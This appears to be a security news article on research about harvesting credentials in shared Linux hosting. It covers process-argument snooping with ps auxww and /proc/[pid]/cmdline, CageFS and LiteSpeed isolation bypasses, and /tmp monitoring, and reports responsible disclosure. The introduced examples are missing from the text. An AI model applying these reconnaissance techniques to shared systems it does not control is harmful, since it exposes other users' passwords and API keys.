A significant vulnerability in multi-user Linux environments, where standard system behaviors can be exploited to harvest sensitive credentials and secrets from other users.
The research, presented in “Silent Leaks: Harvesting Secrets from Shared Linux Environments,” demonstrates how legitimate system tools become weapons for reconnaissance in shared hosting environments.
The attack methodology leverages fundamental Linux transparency features that were originally designed for trusted multi-user environments like universities and shared laboratories.
Key Takeaways
1. ps auxww and /proc/[pid]/cmdline expose live passwords and API keys from other users' processes.
2. CageFS, chroot, and LiteSpeed can be bypassed via hosting panel binaries and shared logs.
3. /tmp directory surveillance captures sensitive files containing credentials and secrets.
These systems prioritize debugging capabilities and system monitoring over strict inter-user isolation, creating opportunities for malicious actors to gather intelligence without triggering traditional security alerts.
Process Information Exploitation
The primary attack vector exploits the default visibility of process arguments through commands like ps auxww and accessing /proc/[pid]/cmdline.
Ionut Cernica’s research shows how attackers can continuously monitor these process lists to capture real-time credential exposures.
Real-world examples from the research include database credentials leaked through WordPress CLI operations:
System administration commands also expose sensitive information during user creation and database operations:
The researcher documented cases where administrative passwords, API keys, and database credentials were visible to any user capable of executing basic process monitoring commands.
This includes scenarios where root-level operations inadvertently expose credentials through command-line arguments.
Bypass Isolation Systems and Exploiting Temporary Files
Even in environments protected by isolation systems like CageFS and chroot jails, Cernica successfully demonstrated escape techniques.
One notable case involved exploiting a hosting panel binary that inadvertently ran outside the CageFS environment, providing access to the real host system.
The research also highlighted vulnerabilities in LiteSpeed web server configurations where accessing /proc/self/fd/2 allowed attackers to read shared stderr.log files, exposing real-time error output from other users’ scripts.
This included PayPal API tokens and session cookies:
Temporary file monitoring presents another significant threat vector. Scripts that monitor /tmp directories can capture sensitive files including SQL dumps, configuration files, and installation logs containing administrative passwords.
The researcher documented cases where installation logs exposed critical system credentials:
The implications extend beyond traditional hosting providers to development servers, educational laboratories, VPS environments, and CTF infrastructure.
Cernica responsibly disclosed these vulnerabilities to major hosting platforms in April, with fixes currently in progress across affected systems.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
